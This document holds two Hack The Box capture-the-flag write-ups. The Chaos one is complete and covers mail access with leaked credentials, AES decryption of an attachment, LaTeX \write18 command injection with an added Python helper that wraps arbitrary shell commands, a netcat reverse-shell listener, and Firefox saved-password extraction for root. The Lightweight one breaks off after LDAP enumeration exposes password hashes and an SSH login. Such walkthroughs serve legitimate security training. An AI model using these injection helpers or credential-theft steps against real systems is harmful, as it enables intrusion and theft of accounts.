Hackthebox Chaos Writeup


Explanation

Hack The Box is a website that hosts a set of vulnerable machines on its own VPN. This is a write-up of the machine “Chaos” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.120 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-05 10:19 EEST
Nmap scan report for chaos (10.10.10.120)
Host is up (0.035s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING AUTH-RESP-CODE STLS SASL CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have more SASL-IR post-login LITERAL+ listed capabilities IDLE ID LOGIN-REFERRALS IMAP4rev1 Pre-login STARTTLS OK LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have SASL-IR more LITERAL+ post-login listed IDLE ID AUTH=PLAINA0001 IMAP4rev1 capabilities Pre-login OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING USER AUTH-RESP-CODE SASL(PLAIN) CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after:  2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.86 seconds

Gobuster HTTP:

root@kali:~# gobuster -u http://10.10.10.120/ -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.120/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/06/05 10:23:29 Starting gobuster
=====================================================
/wp (Status: 301)
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
2019/06/05 10:50:39 Finished
=====================================================

2. Getting User

We found the directory “wp”, which hosts a WordPress site.

One post is password protected and shows a password input box.

The post is by the user “human”.
Using “human” as the password passes the check and reveals the following webmail credential:

ayush:jiujitsu

IMAP and IMAPS are running on this server and are reachable from other hosts.
Plain IMAP on 143 advertises LOGINDISABLED until STARTTLS, so we use openssl as a TLS client to talk to IMAPS on 993 and log in with the recovered credential.

root@kali:~# openssl s_client -connect 10.10.10.120:993

~~~

a login ayush jiujitsu
a OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in

The following commands enumerate the mailboxes.
Only “Drafts” contains a message (1 EXISTS); Sent and INBOX are empty.

a list "" *
* LIST (\NoInferiors \UnMarked \Drafts) "/" Drafts
* LIST (\NoInferiors \UnMarked \Sent) "/" Sent
* LIST (\HasNoChildren) "/" INBOX
a OK List completed (0.003 + 0.000 + 0.002 secs).

a select Drafts
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1540728611] UIDs valid
* OK [UIDNEXT 5] Predicted next UID
a OK [READ-WRITE] Select completed (0.003 + 0.000 + 0.002 secs).

a select Sent
* OK [CLOSED] Previous mailbox closed.
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1540728610] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
a OK [READ-WRITE] Select completed (0.002 + 0.000 + 0.001 secs).

a select INBOX
* OK [CLOSED] Previous mailbox closed.
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1540728609] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
a OK [READ-WRITE] Select completed (0.001 + 0.000 + 0.001 secs).

After selecting “Drafts”, we can read the message and its attachments with the following command.

a fetch 1 body[]    
* 1 FETCH (BODY[] {2532}
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
 format=flowed

Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush

--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
 name=enim_msg.txt
Content-Disposition: attachment;
 filename=enim_msg.txt;
 size=272

MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
 name=en.py
Content-Disposition: attachment;
 filename=en.py;
 size=804
~~~

--=_00b34a28b9033c43ed09c0950f4176e1--
)
a OK Fetch completed (0.002 + 0.000 + 0.001 secs).

Both attachments are only base64 encoded, so en.py decodes directly.
enim_msg.txt, however, is AES-encrypted by that script, so one more step is needed to recover the message.

root@kali:~# cat en.py

~~~

root@kali:~# cat en.py | base64 -d
# (imports added here: they are not in the writeup's copy of the attachment,
#  but the code below needs them; this is the PyCrypto/PyCryptodome API)
import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    # 16-digit plaintext length and a random 16-byte IV precede the ciphertext
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV =Random.new().read(16)

    encryptor = AES.new(key, AES.MODE_CBC, IV)

    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)

            while True:
                chunk = infile.read(chunksize)

                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    # pad the last chunk with spaces to a 16-byte boundary
                    chunk += b' ' * (16 - (len(chunk) % 16))

                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    # the AES-256 key is the raw SHA-256 digest of the password
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

root@kali:~# cat enim_msg.txt 
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=

root@kali:~# cat enim_msg.txt | base64 -d
0000000000000234��z�سpK8�ZC����^9�kW����&w�9ܾ����E��'q�[���9�Z��3����.�C��������;��3������6���R`n
                퍦3�>�}3A����d��FY
                                  ��YDo!�R#~�[��8����a4❄��á>)K�M^�z�I���,��ݨB���qݕYqˏR���q�M�ߟ.w�ʢF�@m�9
                        �JD����(�^�7�5~�"���}��0�?�U�qX(��r�]�w���zGO

So en.py is the encryption half of a small Python AES tool: the key is the SHA-256 digest of a password, the output starts with the plaintext length as 16 ASCII digits and a random IV, and the file is AES-CBC encrypted after padding the last chunk with spaces to a 16-byte boundary.
The same code is in the hack1lab Python-Scripts repository as crypto.py, which also contains the matching decrypt routine.
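Here is an added decryptor for the container format en.py produces, written for this write-up rather than taken from en.py or from the hack1lab repository. It derives the key exactly as getKey() does (SHA-256 of the password), splits the 16-digit length header and the IV off the blob, AES-CBC decrypts, and trims the space padding back to the declared length. The embedded ciphertext is enim_msg.txt as fetched above; which AES backend is installed is an assumption, so the code tries PyCryptodome (the API en.py uses) and falls back to the cryptography package.

```python
import base64
import hashlib

# enim_msg.txt exactly as fetched above: base64 of the container en.py wrote
# (16 ASCII digits of plaintext length, 16-byte IV, then AES-256-CBC ciphertext).
ENIM_MSG_B64 = (
    "MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9"
    "RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M"
    "7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e"
    "6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge"
    "+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08="
)


def derive_key(password):
    """Same as getKey() in en.py: the AES-256 key is the raw SHA-256 of the password."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def parse_container(blob):
    """Split en.py's output into (declared plaintext size, IV, ciphertext)."""
    if len(blob) < 32:
        raise ValueError("container too short for header + IV")
    size = int(blob[:16].decode("ascii"))   # str(filesize).zfill(16) in en.py
    iv, ct = blob[16:32], blob[32:]
    if len(ct) % 16:
        raise ValueError("ciphertext is not a multiple of the AES block size")
    if size > len(ct):
        raise ValueError("declared size exceeds ciphertext length")
    return size, iv, ct


def container_info():
    """Header facts for the captured enim_msg.txt, available before any decryption."""
    size, iv, ct = parse_container(base64.b64decode(ENIM_MSG_B64))
    return {"size": size, "iv_len": len(iv), "ct_len": len(ct)}


def _aes_cbc_decrypt(key, iv, ct):
    # Assumption: either PyCryptodome (the API en.py itself uses) or the
    # cryptography package is installed; try the first, fall back to the second.
    try:
        from Crypto.Cipher import AES
        return AES.new(key, AES.MODE_CBC, iv).decrypt(ct)
    except ImportError:
        from cryptography.hazmat.backends import default_backend
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()).decryptor()
        return dec.update(ct) + dec.finalize()


def aes_available():
    """True if one of the two AES backends above can be imported."""
    for mod in ("Crypto.Cipher", "cryptography.hazmat.primitives.ciphers"):
        try:
            __import__(mod)
            return True
        except ImportError:
            pass
    return False


def decrypt_message(b64_text, password):
    """Reverse en.py: returns the plaintext with the space padding removed."""
    size, iv, ct = parse_container(base64.b64decode(b64_text))
    plaintext = _aes_cbc_decrypt(derive_key(password), iv, ct)
    return plaintext[:size]


if __name__ == "__main__":
    # The mail to sahay says "You are the password", so that is the guess to try.
    print(container_info())
    if aes_available():
        print(decrypt_message(ENIM_MSG_B64, "sahay").decode("ascii", "replace"))
```

Because the scheme has no integrity check, a wrong password does not fail: it just produces garbage, so the sanity checks are the header (the length must fit in the ciphertext) and whether the result is readable. Note also that the ciphertext length leaks the plaintext length to within a block, and that the length header itself is sent unencrypted.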

The mail to sahay says “You are the password”, so the password is “sahay”.
The following commands decrypt the message with the repository’s crypto.py; the plaintext ends up in the file “bin”.

root@kali:~# cat enim_msg.txt 
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=

root@kali:~# cat enim_msg.txt | base64 -d > bin.hacklab

root@kali:~# python Python-Scripts/crypto.py -d bin.hacklab -p sahay


	
	               |
	               |
	          -----+------        -----------
	               |                                   
	               |
	    )                                           (
	    \ \                                       / /
	     \ |\                                   / |/
	      \|  \           hack1lab            /   /
	       \   |\         --------          / |  /
	        \  |  \_______________________/   | /
	         \ |    |      |      |      |    |/
	          \|    |      |      |      |    /
	           \____|______|______|______|___/



	              By: @hacklab, @mohamed1lar
	          fb.me/hack1lab, fb.me/mohamed1lar


[+] Decrypting......
[+] removing file......

[+] Done

root@kali:~# cat bin
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK

root@kali:~# cat bin | base64 -d
Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush

The message points to http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3.
Add the following line to /etc/hosts so that the name resolves and the request carries the chaos.htb Host header.

10.10.10.120	chaos.htb

That path hosts a page that builds a PDF from submitted text through a LaTeX compile step.

The response includes the compiler log, which shows the page is running pdfTeX 3.14159265-2.6-1.40.19.

The same log contains the line “\write18 enabled”.
\write18 is TeX’s shell-escape primitive, and that line means it is enabled without restriction: any \immediate\write18{...} in the submitted document is executed on the server when we press “Create PDF”.
Putting a reverse shell command there and pressing the button gives us a connection back to our listener.
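As an added example (not part of the original write-up), the following classifies what the pdfTeX banner in the server’s response actually says about shell escape, and builds the minimal LaTeX document that exercises it. The log lines are constructed samples in the format pdfTeX prints; the probe command and the helper names are assumptions.

```python
import base64
import re

# Constructed samples of the banner pdfTeX prints at the top of its log. The
# first matches what the "Create PDF" response shows (1.40.19, shell escape
# fully on); the other two are the two safer configurations.
LOG_UNRESTRICTED = (
    "This is pdfTeX, Version 3.14159265-2.6-1.40.19 (TeX Live 2018) (preloaded format=pdflatex)\n"
    " \\write18 enabled.\n"
)
LOG_RESTRICTED = "This is pdfTeX, Version 3.14159265-2.6-1.40.19\n restricted \\write18 enabled.\n"
LOG_DISABLED = "This is pdfTeX, Version 3.14159265-2.6-1.40.19\n \\write18 disabled.\n"

_BANNER = re.compile(r"^\s*(restricted )?\\write18 (enabled|disabled)\.", re.MULTILINE)


def shell_escape_mode(log_text):
    """Classify the pdfTeX banner: 'unrestricted' = arbitrary commands run,
    'restricted' = only programs whitelisted in texmf.cnf (shell_escape_commands),
    'disabled' = \\write18 is a no-op; None if the banner line is missing."""
    m = _BANNER.search(log_text)
    if not m:
        return None
    if m.group(2) == "disabled":
        return "disabled"
    return "restricted" if m.group(1) else "unrestricted"


# Characters TeX treats specially while reading the \write18 argument; a command
# containing them is mangled or stops compilation before the shell ever runs.
_TEX_SPECIALS = set("\\{}$&#^_%~")


def build_probe_document(command):
    """Minimal LaTeX document that runs `command` through \\immediate\\write18."""
    bad = sorted(_TEX_SPECIALS & set(command))
    if bad:
        raise ValueError("command contains TeX special characters %r; "
                         "use wrap_command() instead" % "".join(bad))
    return "\n".join([
        r"\documentclass{article}",
        r"\begin{document}",
        r"\immediate\write18{%s}" % command,
        r"\end{document}",
        "",
    ])


def wrap_command(command):
    """Encode an arbitrary shell command so only TeX-safe characters remain
    (base64 uses A-Z a-z 0-9 + / =, none of which TeX treats specially)."""
    b64 = base64.b64encode(command.encode()).decode()
    return "echo %s | base64 -d | sh" % b64


if __name__ == "__main__":
    print(shell_escape_mode(LOG_UNRESTRICTED))
    print(build_probe_document(wrap_command("id > /tmp/probe.txt")))
```

Only the bare “\write18 enabled.” banner gives arbitrary command execution; “restricted \write18 enabled.” (the TeX Live default) runs only the programs listed in shell_escape_commands. The output of \write18 is not placed in the PDF, which is why the write-up catches a reverse shell with nc rather than reading the command’s output from the document.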

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.120] 49920
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Then we upgrade to a full TTY and switch to ayush, reusing the webmail password.

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$

www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ su - ayush
Password: jiujitsu

ayush@chaos:~$

However, ayush’s $PATH contains only /home/ayush/.app, so even ls is not found.
We have to extend it.

ayush@chaos:~$ ls
ls
Command 'ls' is available in '/bin/ls'
The command could not be located because '/bin' is not included in the PATH environment variable.
ls: command not found

ayush@chaos:~$ echo $PATH
echo $PATH
/home/ayush/.app

Appending the standard directories with export restores the usual commands.
user.txt is in /home/ayush.

ayush@chaos:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

ayush@chaos:~$ echo $PATH
/home/ayush/.app:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

ayush@chaos:~$ ls
mail  user.txt

ayush@chaos:~$ cat user.txt
eef39126d9c3b4b8a30286970dc713e1

3. Getting Root

The home directory of ayush contains a “.mozilla” directory.
Note also that .bashrc and .app are owned by root: that is presumably how the restricted PATH is enforced.

ayush@chaos:~$ ls -la
total 40
drwx------ 6 ayush ayush 4096 Jun  8 06:15 .
drwxr-xr-x 4 root  root  4096 Oct 28  2018 ..
drwxr-xr-x 2 root  root  4096 Oct 28  2018 .app
-rw------- 1 root  root     0 Nov 24  2018 .bash_history
-rw-r--r-- 1 ayush ayush  220 Oct 28  2018 .bash_logout
-rwxr-xr-x 1 root  root    22 Oct 28  2018 .bashrc
drwx------ 3 ayush ayush 4096 Jun  8 06:15 .gnupg
drwx------ 3 ayush ayush 4096 Oct 28  2018 mail
drwx------ 4 ayush ayush 4096 Sep 29  2018 .mozilla
-rw-r--r-- 1 ayush ayush  807 Oct 28  2018 .profile
-rw------- 1 ayush ayush   33 Oct 28  2018 user.txt

Firefox’s stored logins are in “logins.json” in the following profile directory. The username and password fields are encrypted with a key from the profile’s key database, so they cannot be read directly.

ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ ls -l | grep "login"
ls -l | grep "login"
-rw------- 1 ayush ayush      570 Oct 27  2018 logins.json

ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cat logins.json
cat logins.json
{"nextId":3,"logins":[{"id":2,"hostname":"https://chaos.htb:10000","httpRealm":null,"formSubmitURL":"https://chaos.htb:10000","usernameField":"user","passwordField":"pass","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDSAazrlUMZFBAhbsMDAlL9iaw==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNx7bW1TuuCuBBAP8YwnxCZH0+pLo6cJJxnb","guid":"{cb6cd202-0ff8-4de5-85df-e0b8a0f18778}","encType":1,"timeCreated":1540642202692,"timeLastUsed":1540642202692,"timePasswordChanged":1540642202692,"timesUsed":1}],"disabledHosts":[],"version":2}

We can decrypt them with the firefox_decrypt.py script, copied to the box and run against the profile; the master password is ayush’s own password, jiujitsu.

ayush@chaos:~$ python firefox_decrypt.py
python firefox_decrypt.py

Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default: jiujitsu


Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

The saved Webmin credential is root’s system password, and it works for su as well.

ayush@chaos:~$ su root
su root
Password: Thiv8wrej~

root@chaos:/home/ayush# cd
cd

root@chaos:~# cat root.txt
cat root.txt
4eca7e09e3520e020884563cfbabbc70

Hackthebox Lightweight Writeup


Explanation

Hack The Box is a website that hosts a set of vulnerable machines on its own VPN. This is a write-up of the machine “Lightweight” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:/usr/share/wordlists# nmap -sV -sC -p- 10.10.10.119
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-20 07:54 EET
Nmap scan report for 10.10.10.119
Host is up (0.036s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 164.37 seconds

This box blocks hosts that send a burst of traffic, so gobuster is not usable here; the attempt below starts getting connection refused almost immediately.

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.119 -x .php

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.119/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2019/05/17 18:26:20 Starting gobuster
=====================================================
/index.php (Status: 200)
2019/05/17 18:26:21 [!] Get http://10.10.10.119/15.php: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/icons: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/docs: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/18.php: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/features: dial tcp 10.10.10.119:80: connect: connection refused
/info.php (Status: 200)
2019/05/17 18:26:21 [!] Get http://10.10.10.119/tools: dial tcp 10.10.10.119:80: connect: connection refused
2019/05/17 18:26:21 [!] Get http://10.10.10.119/9.php: dial tcp 10.10.10.119:80: connect: connection refused

LDAP enumeration (the server allows anonymous bind, and its ACL even exposes the userPassword attribute, so both SHA-512 crypt hashes could be handed to a cracker):

root@kali:/usr/share/wordlists# nmap -p 389 10.10.10.119 --script ldap-search --script-args 'ldap.qfilter=all'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-20 08:03 EET
Nmap scan report for 10.10.10.119
Host is up (0.037s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: lightweight htb
|         dc: lightweight
|     dn: cn=Manager,dc=lightweight,dc=htb
|         objectClass: organizationalRole
|         cn: Manager
|         description: Directory Manager
|     dn: ou=People,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: People
|     dn: ou=Group,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: Group
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         cn: ldapuser1
|         sn: ldapuser1
|         mail: ldapuser1@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1000
|         gidNumber: 1000
|         homeDirectory: /home/ldapuser1
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         cn: ldapuser2
|         sn: ldapuser2
|         mail: ldapuser2@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1001
|         gidNumber: 1001
|         homeDirectory: /home/ldapuser2
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser1
|         userPassword: {crypt}x
|         gidNumber: 1000
|     dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser2
|         userPassword: {crypt}x
|_        gidNumber: 1001

Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds

2. Getting User

Since gobuster cannot be used, we enumerate the website manually.

In this top page, we can find links to following pages.

  1. /info.php
  2. /status.php
  3. /user.php

user.php contains the interesting information: an SSH account has been created for our VPN address, with the IP as both username and password.

So we can log in to this box over SSH with the following credential:

10.10.14.4:10.10.14.4

root@kali:~# ssh 10.10.14.4@10.10.10.119
The authenticity of host '10.10.10.119 (10.10.10.119)' can't be established.
ECDSA key fingerprint is SHA256:FWyyew+o9WoPYkfIKGEbTMsexks1z8ZkSUs9O+2AMSU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.119' (ECDSA) to the list of known hosts.
10.10.14.4@10.10.10.119's password:  # 10.10.14.4
[10.10.14.4@lightweight ~]$

After logging in, we can see another such user, “10.10.14.2”, created for a different client address.

[10.10.14.4@lightweight home]$ ls -la
total 0
drwxr-xr-x.  6 root       root        76 May 17 16:25 .
dr-xr-xr-x. 17 root       root       224 Jun 13  2018 ..
drwx------.  4 10.10.14.2 10.10.14.2  91 Nov 16 22:39 10.10.14.2
drwx------.  4 10.10.14.4 10.10.14.4  91 May 17 17:44 10.10.14.4
